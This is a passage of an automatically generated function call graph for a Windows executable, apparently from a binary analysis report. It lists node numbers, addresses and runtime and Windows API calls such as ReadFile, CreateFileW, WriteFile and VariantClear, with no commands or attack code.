__tsopen_nolock 87432->87433 87434 41dfe0 87433->87434 87435 41dffb 87433->87435 87555 417f8a 46 API calls __getptd_noexit 87434->87555 87436 41e007 87435->87436 87441 41e041 87435->87441 87557 417f8a 46 API calls __getptd_noexit 87436->87557 87439 41dfe5 87556 417f77 46 API calls __getptd_noexit 87439->87556 87440 41e00c 87558 417f77 46 API calls __getptd_noexit 87440->87558 87444 41e063 87441->87444 87445 41e04e 87441->87445 87446 41ae56 ___lock_fhandle 48 API calls 87444->87446 87560 417f8a 46 API calls __getptd_noexit 87445->87560 87449 41e069 87446->87449 87447 41e014 87559 417f25 10 API calls __tsopen_nolock 87447->87559 87451 41e077 87449->87451 87452 41e08b 87449->87452 87450 41e053 87561 417f77 46 API calls __getptd_noexit 87450->87561 87486 41da15 87451->87486 87562 417f77 46 API calls __getptd_noexit 87452->87562 87455 41dfed __tsopen_nolock 87455->87426 87458 41e083 87564 41e0ba LeaveCriticalSection __unlock_fhandle 87458->87564 87459 41e090 87563 417f8a 46 API calls __getptd_noexit 87459->87563 87463 41d900 87462->87463 87467 41d915 87462->87467 87568 417f77 46 API calls __getptd_noexit 87463->87568 87465 41d905 87569 417f25 10 API calls __tsopen_nolock 87465->87569 87468 41d94a 87467->87468 87473 41d910 87467->87473 87565 420603 87467->87565 87470 414139 __flush 46 API calls 87468->87470 87471 41d95e 87470->87471 87472 41dfcc __read 59 API calls 87471->87472 87474 41d965 87472->87474 87473->87426 87474->87473 87475 414139 __flush 46 API calls 87474->87475 87476 41d988 87475->87476 87476->87473 87477 414139 __flush 46 API calls 87476->87477 87478 41d994 87477->87478 87478->87473 87479 414139 __flush 46 API calls 87478->87479 87480 41d9a1 87479->87480 87481 414139 __flush 46 API calls 87480->87481 87481->87473 87482->87418 87483->87421 87484->87426 87485->87418 87487 41da31 87486->87487 87488 41da4c 87486->87488 87489 417f8a __tsopen_nolock 46 API calls 87487->87489 87490 41da5b 87488->87490 87492 41da7a 87488->87492 87491 41da36 87489->87491 87493 417f8a __tsopen_nolock 46 API calls 87490->87493 87495 417f77 __tsopen_nolock 46 API calls 87491->87495 87494 41da98 87492->87494 87508 41daac 87492->87508 87496 41da60 87493->87496 87497 417f8a __tsopen_nolock 46 API calls 87494->87497 87509 41da3e 87495->87509 87499 417f77 __tsopen_nolock 46 API calls 87496->87499 87501 41da9d 87497->87501 87498 41db02 87500 417f8a __tsopen_nolock 46 API calls 87498->87500 87502 41da67 87499->87502 87503 41db07 87500->87503 87504 417f77 __tsopen_nolock 46 API calls 87501->87504 87505 417f25 __tsopen_nolock 10 API calls 87502->87505 87506 417f77 __tsopen_nolock 46 API calls 87503->87506 87507 41daa4 87504->87507 87505->87509 87506->87507 87512 417f25 __tsopen_nolock 10 API calls 87507->87512 87508->87498 87508->87509 87510 41dae1 87508->87510 87511 41db1b 87508->87511 87509->87458 87510->87498 87513 41daec ReadFile 87510->87513 87515 416b04 __malloc_crt 46 API calls 87511->87515 87512->87509 87516 41dc17 87513->87516 87517 41df8f GetLastError 87513->87517 87518 41db31 87515->87518 87516->87517 87523 41dc2b 87516->87523 87519 41de16 87517->87519 87520 41df9c 87517->87520 87521 41db59 87518->87521 87522 41db3b 87518->87522 87529 417f9d __dosmaperr 46 API calls 87519->87529 87534 41dd9b 87519->87534 87525 417f77 __tsopen_nolock 46 API calls 87520->87525 87524 420494 __lseeki64_nolock 48 API calls 87521->87524 87526 417f77 __tsopen_nolock 46 API calls 87522->87526 87523->87534 87540 41dc47 87523->87540 87541 41de5b 87523->87541 87527 41db67 87524->87527 87528 41dfa1 87525->87528 87530 41db40 87526->87530 87527->87513 87532 417f8a __tsopen_nolock 46 API calls 87528->87532 87529->87534 87531 417f8a __tsopen_nolock 46 API calls 87530->87531 87531->87509 87532->87534 87533 413748 _free 46 API calls 87533->87509 87534->87509 87534->87533 87535 41ded0 ReadFile 87538 41deef GetLastError 87535->87538 87547 41def9 87535->87547 87536 41dcab ReadFile 87537 41dcc9 GetLastError 87536->87537 87546 41dcd3 87536->87546 87537->87540 87537->87546 87538->87541 87538->87547 87539 41ddec MultiByteToWideChar 87539->87534 87542 41de10 GetLastError 87539->87542 87540->87536 87543 41dd28 87540->87543 87541->87534 87541->87535 87542->87519 87543->87534 87544 41dda3 87543->87544 87545 41dd96 87543->87545 87549 41dd60 87543->87549 87544->87549 87550 41ddda 87544->87550 87548 417f77 __tsopen_nolock 46 API calls 87545->87548 87546->87540 87551 420494 __lseeki64_nolock 48 API calls 87546->87551 87547->87541 87552 420494 __lseeki64_nolock 48 API calls 87547->87552 87548->87534 87549->87539 87553 420494 __lseeki64_nolock 48 API calls 87550->87553 87551->87546 87552->87547 87554 41dde9 87553->87554 87554->87539 87555->87439 87556->87455 87557->87440 87558->87447 87559->87455 87560->87450 87561->87447 87562->87459 87563->87458 87564->87455 87566 416b04 __malloc_crt 46 API calls 87565->87566 87567 420618 87566->87567 87567->87468 87568->87465 87569->87473 87573 4148b3 GetSystemTimeAsFileTime __aulldiv 87570->87573 87572 442c6b 87572->87076 87573->87572 87574->87083 87575->87089 87576->87089 87582 45272f __tzset_nolock _wcscpy 87577->87582 87578 414d04 61 API calls __fread_nolock 87578->87582 87579 44afef GetSystemTimeAsFileTime 87579->87582 87580 4528a4 87580->86998 87580->86999 87581 4150d1 81 API calls _fseek 87581->87582 87582->87578 87582->87579 87582->87580 87582->87581 87584 44b1bc 87583->87584 87585 44b1ca 87583->87585 87586 4149c2 116 API calls 87584->87586 87587 44b1e1 87585->87587 87588 4149c2 116 API calls 87585->87588 87589 44b1d8 87585->87589 87586->87585 87618 4321a4 87587->87618 87590 44b2db 87588->87590 87589->87025 87590->87587 87592 44b2e9 87590->87592 87594 44b2f6 87592->87594 87597 414a46 __fcloseall 82 API calls 87592->87597 87593 44b224 87595 44b253 87593->87595 87596 44b228 87593->87596 87594->87025 87622 43213d 87595->87622 87599 44b235 87596->87599 87600 414a46 __fcloseall 82 API calls 87596->87600 87597->87594 87601 44b245 87599->87601 87603 414a46 __fcloseall 82 API calls 87599->87603 87600->87599 87601->87025 87602 44b25a 87604 44b260 87602->87604 87605 44b289 87602->87605 87603->87601 87607 44b26d 87604->87607 87609 414a46 __fcloseall 82 API calls 87604->87609 87632 44b0bf 87 API calls 87605->87632 87610 44b27d 87607->87610 87611 414a46 __fcloseall 82 API calls 87607->87611 87608 44b28f 87633 4320f8 46 API calls _free 87608->87633 87609->87607 87610->87025 87611->87610 87613 44b295 87614 414a46 __fcloseall 82 API calls 87613->87614 87616 44b2a2 87613->87616 87614->87616 87615 44b2b2 87615->87025 87616->87615 87617 414a46 __fcloseall 82 API calls 87616->87617 87617->87615 87619 4321cb 87618->87619 87621 4321b4 __tzset_nolock _memmove 87618->87621 87620 414d04 __fread_nolock 61 API calls 87619->87620 87620->87621 87621->87593 87623 4135bb _malloc 46 API calls 87622->87623 87624 432150 87623->87624 87625 4135bb _malloc 46 API calls 87624->87625 87626 432162 87625->87626 87627 4135bb _malloc 46 API calls 87626->87627 87628 432174 87627->87628 87630 432189 87628->87630 87634 4320f8 46 API calls _free 87628->87634 87630->87602 87631 432198 87631->87602 87632->87608 87633->87613 87634->87631 87635->86928 87636->86930 87637->86948 87638->86948 87639->86948 87640->86941 87641->86948 87642->86948 87643->86953 87644->86963 87645->86961 87646->86961 87696 410160 87647->87696 87649 41012f GetFullPathNameW 87650 410147 ctype 87649->87650 87650->86784 87652 4102cb SHGetDesktopFolder 87651->87652 87655 410333 _wcsncpy 87651->87655 87653 4102e0 _wcsncpy 87652->87653 87652->87655 87654 41031c SHGetPathFromIDListW 87653->87654 87653->87655 87654->87655 87655->86787 87657 4101bb 87656->87657 87662 425f4a 87656->87662 87658 410160 52 API calls 87657->87658 87659 4101c7 87658->87659 87700 410200 52 API calls 2 library calls 87659->87700 87660 4114ab __wcsicoll 58 API calls 87660->87662 87662->87660 87664 425f6e 87662->87664 87663 4101d6 87701 410200 52 API calls 2 library calls 87663->87701 87664->86789 87666 4101e9 87666->86789 87668 40f760 128 API calls 87667->87668 87669 40f584 87668->87669 87670 429335 87669->87670 87671 40f58c 87669->87671 87674 4528bd 118 API calls 87670->87674 87672 40f598 87671->87672 87673 429358 87671->87673 87726 4033c0 113 API calls 7 library calls 87672->87726 87727 434034 86 API calls _wprintf 87673->87727 87677 42934b 87674->87677 87680 429373 87677->87680 87681 42934f 87677->87681 87678 429369 87678->87680 87679 40f5b4 87679->86785 87682 4115d7 52 API calls 87680->87682 87683 431e58 82 API calls 87681->87683 87684 4293c5 ctype 87682->87684 87683->87673 87685 42959c 87684->87685 87693 401b10 52 API calls 87684->87693 87702 444af8 87684->87702 87705 44b41c 87684->87705 87712 402780 87684->87712 87720 4022d0 87684->87720 87728 44c7dd 64 API calls 3 library calls 87684->87728 87686 413748 _free 46 API calls 87685->87686 87687 4295a5 87686->87687 87688 431e58 82 API calls 87687->87688 87689 4295b1 87688->87689 87693->87684 87697 410167 _wcslen 87696->87697 87698 4115d7 52 API calls 87697->87698 87699 41017e _wcscpy 87698->87699 87699->87649 87700->87663 87701->87666 87703 4115d7 52 API calls 87702->87703 87704 444b27 _memmove 87703->87704 87704->87684 87706 44b429 87705->87706 87707 4115d7 52 API calls 87706->87707 87708 44b440 87707->87708 87709 44b45e 87708->87709 87710 401b10 52 API calls 87708->87710 87709->87684 87711 44b453 87710->87711 87711->87684 87713 402790 ctype _memmove 87712->87713 87714 402827 87712->87714 87715 4115d7 52 API calls 87713->87715 87716 4115d7 52 API calls 87714->87716 87717 402797 87715->87717 87716->87713 87718 4115d7 52 API calls 87717->87718 87719 4027bd 87717->87719 87718->87719 87719->87684 87721 4022e0 87720->87721 87723 40239d 87720->87723 87722 4115d7 52 API calls 87721->87722 87721->87723 87724 402320 ctype 87721->87724 87722->87724 87723->87684 87724->87723 87725 4115d7 52 API calls 87724->87725 87725->87724 87726->87679 87727->87678 87728->87684 87730 402417 87729->87730 87734 402539 ctype 87729->87734 87731 4115d7 52 API calls 87730->87731 87730->87734 87732 402443 87731->87732 87733 4115d7 52 API calls 87732->87733 87736 4024b4 87733->87736 87734->86793 87736->87734 87737 4022d0 52 API calls 87736->87737 87758 402880 95 API calls 2 library calls 87736->87758 87737->87736 87743 401566 87738->87743 87739 401794 87759 40e9a0 90 API calls 87739->87759 87742 40167a 87745 4017c0 87742->87745 87760 45e737 90 API calls 3 library calls 87742->87760 87743->87739 87743->87742 87744 4010a0 52 API calls 87743->87744 87744->87743 87745->86795 87747 40bc70 52 API calls 87746->87747 87756 40d451 87747->87756 87748 40d50f 87763 410600 52 API calls 87748->87763 87750 427c01 87764 45e737 90 API calls 3 library calls 87750->87764 87751 40e0a0 52 API calls 87751->87756 87753 401b10 52 API calls 87753->87756 87754 40d519 87754->86798 87756->87748 87756->87750 87756->87751 87756->87753 87756->87754 87761 40f310 53 API calls 87756->87761 87762 40d860 91 API calls 87756->87762 87758->87736 87759->87742 87760->87745 87761->87756 87762->87756 87763->87754 87764->87754 87765->86811 87766->86812 87768 42c5fe 87767->87768 87783 4091c6 87767->87783 87769 40bc70 52 API calls 87768->87769 87768->87783 87770 42c64e InterlockedIncrement 87769->87770 87771 42c665 87770->87771 87776 42c697 87770->87776 87773 42c672 InterlockedDecrement Sleep InterlockedIncrement 87771->87773 87771->87776 87772 42c737 InterlockedDecrement 87774 42c74a 87772->87774 87773->87771 87773->87776 87777 408f40 VariantClear 87774->87777 87775 42c731 87775->87772 87776->87772 87776->87775 88060 408e80 87776->88060 87779 42c752 87777->87779 88069 410c60 VariantClear ctype 87779->88069 87783->86874 87784 42c6db 87785 402160 52 API calls 87784->87785 87786 42c6e5 87785->87786 88065 45340c 85 API calls 87786->88065 87788 42c6f1 88066 40d200 52 API calls 2 library calls 87788->88066 87790 42c6fb 88067 465124 53 API calls 87790->88067 87792 42c715 87793 42c76a 87792->87793 87794 42c719 87792->87794 87795 401b10 52 API calls 87793->87795 88068 46fe32 VariantClear 87794->88068 87797 42c77e 87795->87797 87798 401980 53 API calls 87797->87798 87804 42c796 87798->87804 87799 42c812 88071 46fe32 VariantClear 87799->88071 87801 42c82a InterlockedDecrement 88072 46ff07 54 API calls 87801->88072 87803 42c864 88073 45e737 90 API calls 3 library calls 87803->88073 87804->87799 87804->87803 88070 40ba10 52 API calls 2 library calls 87804->88070 87806 42c9ec 88116 47d33e 329 API calls 87806->88116 87809 42c9fe 88117 46feb1 VariantClear VariantClear 87809->88117 87811 408f40 VariantClear 87821 42c849 87811->87821 87812 42ca08 87813 401b10 52 API calls 87812->87813 87816 42ca15 87813->87816 87814 408f40 VariantClear 87817 42c891 87814->87817 87815 402780 52 API calls 87815->87821 88074 410c60 VariantClear ctype 87817->88074 87820 401980 53 API calls 87820->87821 87821->87806 87821->87811 87821->87815 87821->87820 88075 40a780 87821->88075 87822 42c874 87822->87814 87824 42ca59 87822->87824 87824->87824 87826 40afc4 87825->87826 87827 40b156 87825->87827 87828 40afd5 87826->87828 87829 42d1e3 87826->87829 88127 45e737 90 API calls 3 library calls 87827->88127 87833 40a780 192 API calls 87828->87833 87847 40b11a ctype 87828->87847 88128 45e737 90 API calls 3 library calls 87829->88128 87832 40b143 87832->86874 87835 40b00a 87833->87835 87834 42d1f8 87838 408f40 VariantClear 87834->87838 87835->87834 87839 40b012 87835->87839 87837 42d4db 87837->87837 87838->87832 87840 42d231 VariantClear 87839->87840 87842 40b04a 87839->87842 87848 40b094 ctype 87839->87848 87849 40b05c ctype 87840->87849 87841 40b108 87841->87847 88130 40e270 VariantClear ctype 87841->88130 87842->87849 88129 40e270 VariantClear ctype 87842->88129 87843 42d45a VariantClear 87843->87847 87846 4115d7 52 API calls 87846->87848 87847->87832 88131 45e737 90 API calls 3 library calls 87847->88131 87848->87841 87850 42d425 ctype 87848->87850 87849->87846 87849->87848 87850->87843 87850->87847 87852 408fff 87851->87852 87855 40900d 87851->87855 88132 403ea0 52 API calls __cinit 87852->88132 87856 42c3f6 87855->87856 87858 40a780 192 API calls 87855->87858 87859 42c44a 87855->87859 87861 42c47b 87855->87861 87863 42c4cb 87855->87863 87864 42c564 87855->87864 87867 42c548 87855->87867 87871 409112 87855->87871 87873 42c528 87855->87873 87875 4090df 87855->87875 87879 4090ea 87855->87879 87885 4090f2 ctype 87855->87885 88134 4534e3 52 API calls 87855->88134 88136 40c4e0 192 API calls 87855->88136 88135 45e737 90 API calls 3 library calls 87856->88135 87858->87855 88137 45e737 90 API calls 3 library calls 87859->88137 88138 451b42 61 API calls 87861->88138 88140 47faae 231 API calls 87863->88140 87868 408f40 VariantClear 87864->87868 88143 45e737 90 API calls 3 library calls 87867->88143 87868->87885 87869 42c491 87869->87885 88139 45e737 90 API calls 3 library calls 87869->88139 87870 42c4da 87870->87885 88141 45e737 90 API calls 3 library calls 87870->88141 87871->87867 87877 40912b 87871->87877 88142 45e737 90 API calls 3 library calls 87873->88142 87875->87879 87880 408e80 VariantClear 87875->87880 87877->87885 88133 403e10 53 API calls 87877->88133 87881 408f40 VariantClear 87879->87881 87880->87879 87881->87885 87883 40914b 87884 408f40 VariantClear 87883->87884 87884->87885 87885->86874 88144 408d90 87886->88144 87888 408cf9 87889 429778 87888->87889 87892 42976c 87888->87892 87894 408d2d 87888->87894 88171 410c60 VariantClear ctype 87889->88171 87891 429780 88170 45e737 90 API calls 3 library calls 87892->88170 88160 403d10 87894->88160 87897 408d71 ctype 87897->86874 87898 408f40 VariantClear 87899 408d45 ctype 87898->87899 87899->87897 87899->87898 87901 425c87 87900->87901 87902 40d15f 87900->87902 87903 425cc7 87901->87903 87904 425ca1 TranslateAcceleratorW 87901->87904 87902->86874 87904->87902 87906 42602f 87905->87906 87909 40d17f 87905->87909 87906->86874 87907 42608e IsDialogMessageW 87908 40d18c 87907->87908 87907->87909 87908->86874 87909->87907 87909->87908 88467 430c46 GetClassLongW 87909->88467 87912 4096c6 _wcslen 87911->87912 87913 40a70c ctype _memmove 87912->87913 87914 4115d7 52 API calls 87912->87914 87917 4013a0 52 API calls 87913->87917 87915 4096fa _memmove 87914->87915 87916 4115d7 52 API calls 87915->87916 87918 40971b 87916->87918 87919 4297aa 87917->87919 87918->87913 87920 409749 CharUpperBuffW 87918->87920 87924 40976a ctype 87918->87924 87921 4115d7 52 API calls 87919->87921 87920->87924 87922 4297d1 _memmove 87921->87922 88495 45e737 90 API calls 3 library calls 87922->88495 87972 4097e5 ctype 87924->87972 88469 47dcbb 194 API calls 87924->88469 87926 42a452 87927 408f40 VariantClear 87926->87927 87928 42ae92 87927->87928 88496 410c60 VariantClear ctype 87928->88496 87930 42aea4 87931 409aa2 87931->87922 87933 4115d7 52 API calls 87931->87933 87938 409afe 87931->87938 87932 40a689 87935 4115d7 52 API calls 87932->87935 87933->87938 87934 4115d7 52 API calls 87934->87972 87951 40a6af ctype _memmove 87935->87951 87936 409b2a 87940 429dbe 87936->87940 88004 409b4d ctype _memmove 87936->88004 88477 40b400 VariantClear VariantClear ctype 87936->88477 87937 40c2c0 52 API calls 87937->87972 87938->87936 87939 4115d7 52 API calls 87938->87939 87941 429d31 87939->87941 87946 429dd3 87940->87946 88478 40b400 VariantClear VariantClear ctype 87940->88478 87945 429d42 87941->87945 88474 44a801 52 API calls 87941->88474 87942 429a46 VariantClear 87942->87972 87943 409fd2 87949 40a045 87943->87949 87998 42a3f5 87943->87998 87955 40e0a0 52 API calls 87945->87955 87946->88004 88479 40e1c0 VariantClear ctype 87946->88479 87953 4115d7 52 API calls 87949->87953 87950 408f40 VariantClear 87950->87972 87958 4115d7 52 API calls 87951->87958 87959 40a04c 87953->87959 87960 429d57 87955->87960 87958->87913 87963 40a0a7 87959->87963 87966 4091e0 315 API calls 87959->87966 88475 453443 52 API calls 87960->88475 87962 42a42f 88483 45e737 90 API calls 3 library calls 87962->88483 87983 40a0af 87963->87983 88484 40c790 VariantClear ctype 87963->88484 87964 4299d9 87968 408f40 VariantClear 87964->87968 87966->87963 87967 429abd 87967->86874 87973 4299e2 87968->87973 87969 429d88 88476 453443 52 API calls 87969->88476 87972->87922 87972->87926 87972->87931 87972->87932 87972->87934 87972->87937 87972->87942 87972->87950 87972->87951 87972->87964 87972->87967 87977 40a780 192 API calls 87972->87977 88470 40c4e0 192 API calls 87972->88470 88472 40ba10 52 API calls 2 library calls 87972->88472 88473 40e270 VariantClear ctype 87972->88473 88471 410c60 VariantClear ctype 87973->88471 87977->87972 87978 402780 52 API calls 87978->88004 87980 408f40 VariantClear 88012 40a162 ctype _memmove 87980->88012 87981 4115d7 52 API calls 87981->88004 87982 41130a 51 API calls __cinit 87982->88004 87984 40a11b 87983->87984 87986 42a4b4 VariantClear 87983->87986 87983->88012 87991 40a12d ctype 87984->87991 88485 40e270 VariantClear ctype 87984->88485 87985 40a780 192 API calls 87985->88004 87986->87991 87988 401980 53 API calls 87988->88004 87989 408e80 VariantClear 87989->88004 87990 4115d7 52 API calls 87990->88012 87991->87990 87991->88012 87992 408e80 VariantClear 87992->88012 87994 44a801 52 API calls 87994->88004 87995 42a74d VariantClear 87995->88012 87996 40a368 87997 42aad4 87996->87997 88006 40a397 87996->88006 88488 46fe90 VariantClear VariantClear ctype 87997->88488 88482 47390f VariantClear 87998->88482 87999 42a886 VariantClear 87999->88012 88000 42a7e4 VariantClear 88000->88012 88001 40a3ce 88016 40a3d9 ctype 88001->88016 88489 40b400 VariantClear VariantClear ctype 88001->88489 88003 409c95 88003->86874 88004->87913 88004->87943 88004->87962 88004->87978 88004->87981 88004->87982 88004->87985 88004->87988 88004->87989 88004->87994 88004->87998 88004->88003 88480 45f508 52 API calls 88004->88480 88481 403e10 53 API calls 88004->88481 88005 40e270 VariantClear 88005->88012 88006->88001 88028 40a42c ctype 88006->88028 88468 40b400 VariantClear VariantClear ctype 88006->88468 88009 4115d7 52 API calls 88009->88012 88010 42abaf 88014 42abd4 VariantClear 88010->88014 88022 40a4ee ctype 88010->88022 88011 4115d7 52 API calls 88015 42a5a6 VariantInit VariantCopy 88011->88015 88012->87980 88012->87992 88012->87995 88012->87996 88012->87997 88012->87999 88012->88000 88012->88005 88012->88009 88012->88011 88486 470870 52 API calls 88012->88486 88487 44ccf1 VariantClear ctype 88012->88487 88013 40a4dc 88013->88022 88491 40e270 VariantClear ctype 88013->88491 88014->88022 88015->88012 88018 42a5c6 VariantClear 88015->88018 88017 40a41a 88016->88017 88024 42ab44 VariantClear 88016->88024 88016->88028 88017->88028 88490 40e270 VariantClear ctype 88017->88490 88018->88012 88019 42ac4f 88025 42ac79 VariantClear 88019->88025 88030 40a546 ctype 88019->88030 88022->88019 88023 40a534 88022->88023 88023->88030 88492 40e270 VariantClear ctype 88023->88492 88024->88028 88025->88030 88027 42ad28 88032 42ad4e VariantClear 88027->88032 88037 40a583 ctype 88027->88037 88028->88010 88028->88013 88030->88027 88031 40a571 88030->88031 88031->88037 88493 40e270 VariantClear ctype 88031->88493 88032->88037 88034 40a650 ctype 88034->86874 88035 42ae0e VariantClear 88035->88037 88037->88034 88037->88035 88494 40e270 VariantClear ctype 88037->88494 88038->86874 88039->86822 88040->86827 88041->86874 88042->86874 88043->86874 88044->86874 88045->86879 88046->86879 88047->86879 88048->86879 88049->86879 88050->86879 88051->86879 88053 403cdf 88052->88053 88054 408f40 VariantClear 88053->88054 88055 403ce7 88054->88055 88055->86868 88056->86879 88057->86879 88058->86874 88059->86819 88061 408e88 88060->88061 88063 408e94 88060->88063 88062 408f40 VariantClear 88061->88062 88062->88063 88064 45340c 85 API calls 88063->88064 88064->87784 88065->87788 88066->87790 88067->87792 88068->87775 88069->87783 88070->87804 88071->87801 88072->87821 88073->87822 88074->87783 88076 40a7a6 88075->88076 88077 40ae8c 88075->88077 88079 4115d7 52 API calls 88076->88079 88118 41130a 51 API calls __cinit 88077->88118 88113 40a7c6 ctype _memmove 88079->88113 88080 40a86d 88088 40a878 ctype 88080->88088 88091 40abd1 88080->88091 88081 408e80 VariantClear 88081->88113 88083 401b10 52 API calls 88083->88113 88084 42b791 VariantClear 88084->88113 88085 40b5f0 89 API calls 88085->88113 88086 408f40 VariantClear 88086->88088 88087 42ba2d VariantClear 88087->88113 88088->88086 88090 40a884 ctype 88088->88090 88089 42b459 VariantClear 88089->88113 88090->87821 88123 45e737 90 API calls 3 library calls 88091->88123 88092 42b6f6 VariantClear 88092->88113 88094 40bc10 53 API calls 88094->88113 88095 408cc0 185 API calls 88095->88113 88097 4530c9 VariantClear 88097->88113 88098 40e270 VariantClear 88098->88113 88099 42bbf5 88124 45e737 90 API calls 3 library calls 88099->88124 88100 4115d7 52 API calls 88100->88113 88101 42bb6a 88126 44b92d VariantClear 88101->88126 88102 4115d7 52 API calls 88104 42b5b3 VariantInit VariantCopy 88102->88104 88107 42b5d7 VariantClear 88104->88107 88104->88113 88106 408f40 VariantClear 88106->88113 88107->88113 88110 42bc37 88125 45e737 90 API calls 3 library calls 88110->88125 88113->88080 88113->88081 88113->88083 88113->88084 88113->88085 88113->88087 88113->88089 88113->88091 88113->88092 88113->88094 88113->88095 88113->88097 88113->88098 88113->88099 88113->88100 88113->88101 88113->88102 88113->88106 88113->88110 88119 45308a 53 API calls 88113->88119 88120 470870 52 API calls 88113->88120 88121 457f66 87 API calls __write_nolock 88113->88121 88122 472f47 127 API calls 88113->88122 88114 42bc48 88114->88101 88116->87809 88117->87812 88118->88113 88119->88113 88120->88113 88121->88113 88122->88113 88123->88101 88124->88101 88125->88114 88127->87829 88128->87834 88129->87849 88130->87847 88131->87837 88132->87855 88133->87883 88134->87855 88135->87885 88136->87855 88137->87885 88138->87869 88139->87885 88140->87870 88141->87885 88142->87885 88143->87864 88145 4289d2 88144->88145 88146 408db3 88144->88146 88174 45e737 90 API calls 3 library calls 88145->88174 88172 40bec0 90 API calls 88146->88172 88149 4289e5 88175 45e737 90 API calls 3 library calls 88149->88175 88150 408e5a 88150->87888 88152 428a05 88154 408f40 VariantClear 88152->88154 88154->88150 88155 40a780 192 API calls 88158 408dc9 88155->88158 88156 408e64 88157 408f40 VariantClear 88156->88157 88157->88150 88158->88149 88158->88150 88158->88152 88158->88155 88158->88156 88159 408f40 VariantClear 88158->88159 88173 40ba10 52 API calls 2 library calls 88158->88173 88159->88158 88161 408f40 VariantClear 88160->88161 88162 403d20 88161->88162 88163 403cd0 VariantClear 88162->88163 88164 403d4d 88163->88164 88176 46e91c 88164->88176 88179 467897 88164->88179 88223 45e17d 88164->88223 88233 4755ad 88164->88233 88165 403d76 88165->87889 88165->87899 88170->87889 88171->87891 88172->88158 88173->88158 88174->88149 88175->88152 88236 46e785 88176->88236 88178 46e92f 88178->88165 88180 4678bb 88179->88180 88208 467954 88180->88208 88362 45340c 85 API calls 88180->88362 88181 4115d7 52 API calls 88183 467989 88181->88183 88185 467995 88183->88185 88366 40da60 53 API calls 88183->88366 88184 4678f6 88186 413a0e __wsplitpath 46 API calls 88184->88186 88188 4533eb 85 API calls 88185->88188 88189 4678fc 88186->88189 88190 4679b7 88188->88190 88191 401b10 52 API calls 88189->88191 88192 40de40 60 API calls 88190->88192 88193 46790c 88191->88193 88194 4679c3 88192->88194 88363 40d200 52 API calls 2 library calls 88193->88363 88196 4679c7 GetLastError 88194->88196 88197 467a05 88194->88197 88199 403cd0 VariantClear 88196->88199 88200 467a2c 88197->88200 88201 467a4b 88197->88201 88198 467917 88198->88208 88364 4339fa GetFileAttributesW FindFirstFileW FindClose 88198->88364 88202 4679dc 88199->88202 88204 4115d7 52 API calls 88200->88204 88205 4115d7 52 API calls 88201->88205 88206 4679e6 88202->88206 88212 44ae3e CloseHandle 88202->88212 88210 467a31 88204->88210 88211 467a49 88205->88211 88214 408f40 VariantClear 88206->88214 88207 467928 88207->88208 88213 46792f 88207->88213 88208->88181 88209 467964 88208->88209 88209->88165 88367 436299 52 API calls 2 library calls 88210->88367 88218 408f40 VariantClear 88211->88218 88212->88206 88365 4335cd 56 API calls 3 library calls 88213->88365 88217 4679ed 88214->88217 88217->88165 88220 467a88 88218->88220 88219 467939 88219->88208 88221 408f40 VariantClear 88219->88221 88220->88165 88222 467947 88221->88222 88222->88208 88224 45e198 88223->88224 88225 45e19c 88224->88225 88226 45e1b8 88224->88226 88227 408f40 VariantClear 88225->88227 88228 45e1cc 88226->88228 88229 45e1db FindClose 88226->88229 88230 45e1a4 88227->88230 88231 44ae3e CloseHandle 88228->88231 88232 45e1d9 ctype 88228->88232 88229->88232 88230->88165 88231->88232 88232->88165 88368 475077 88233->88368 88235 4755c0 88235->88165 88237 46e7a2 88236->88237 88238 4115d7 52 API calls 88237->88238 88239 46e802 88237->88239 88240 46e7ad 88238->88240 88242 46e7e5 88239->88242 88249 46e82f 88239->88249 88241 46e7b9 88240->88241 88284 40da60 53 API calls 88240->88284 88285 4533eb 88241->88285 88243 408f40 VariantClear 88242->88243 88245 46e7ea 88243->88245 88245->88178 88248 46e8b5 88277 4680ed 88248->88277 88249->88248 88252 46e845 88249->88252 88255 4533eb 85 API calls 88252->88255 88254 46e8bb 88281 443fbe 88254->88281 88262 46e84b 88255->88262 88257 46e87a 88304 4689f4 59 API calls 88257->88304 88259 46e883 88263 4013c0 52 API calls 88259->88263 88262->88257 88262->88259 88265 46e88f 88263->88265 88266 40e0a0 52 API calls 88265->88266 88268 46e899 88266->88268 88267 408f40 VariantClear 88275 46e881 88267->88275 88305 40d200 52 API calls 2 library calls 88268->88305 88269 46e911 88269->88178 88271 46e8a5 88306 4689f4 59 API calls 88271->88306 88274 46e903 88276 44ae3e CloseHandle 88274->88276 88275->88269 88307 40da20 88275->88307 88276->88269 88278 468100 88277->88278 88279 4680fa 88277->88279 88278->88254 88311 467ac4 88279->88311 88334 443e36 88281->88334 88283 443fd3 88283->88267 88283->88275 88284->88241 88286 453404 88285->88286 88287 4533f8 88285->88287 88289 40de40 88286->88289 88287->88286 88341 4531b1 85 API calls 5 library calls 88287->88341 88290 40da20 CloseHandle 88289->88290 88291 40de4e 88290->88291 88342 40f110 88291->88342 88294 4264fa 88296 40de84 88351 40e080 SetFilePointerEx SetFilePointerEx 88296->88351 88298 40de8b 88352 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88298->88352 88300 40de90 88300->88249 88304->88275 88305->88271 88306->88275 88308 40da37 88307->88308 88309 40da29 88307->88309 88308->88309 88310 40da3c CloseHandle 88308->88310 88309->88274 88310->88274 88312 467bb8 88311->88312 88313 467adc 88311->88313 88312->88278 88314 467c16 88313->88314 88315 467b90 88313->88315 88316 467c1d 88313->88316 88323 467aed 88313->88323 88333 40e270 VariantClear ctype 88314->88333 88319 4115d7 52 API calls 88315->88319 88318 4115d7 52 API calls 88316->88318 88330 467b75 _memmove 88318->88330 88319->88330 88320 467b55 88322 4115d7 52 API calls 88320->88322 88321 4115d7 52 API calls 88321->88312 88324 467b5b 88322->88324 88325 4115d7 52 API calls 88323->88325 88329 467b28 ctype 88323->88329 88331 442ee0 52 API calls 88324->88331 88325->88329 88327 467b6b 88332 45f645 54 API calls ctype 88327->88332 88329->88316 88329->88320 88329->88330 88330->88321 88331->88327 88332->88330 88333->88316 88337 443e19 88334->88337 88338 443e26 88337->88338 88339 443e32 WriteFile 88337->88339 88340 443db4 SetFilePointerEx SetFilePointerEx 88338->88340 88339->88283 88340->88339 88341->88286 88343 40f125 CreateFileW 88342->88343 88344 42630c 88342->88344 88346 40de74 88343->88346 88345 426311 CreateFileW 88344->88345 88344->88346 88345->88346 88347 426337 88345->88347 88346->88294 88350 40dea0 55 API calls ctype 88346->88350 88353 40df90 SetFilePointerEx SetFilePointerEx 88347->88353 88349 426342 88349->88346 88350->88296 88351->88298 88352->88300 88353->88349 88362->88184 88363->88198 88364->88207 88365->88219 88366->88185 88367->88211 88369 4533eb 85 API calls 88368->88369 88370 4750b8 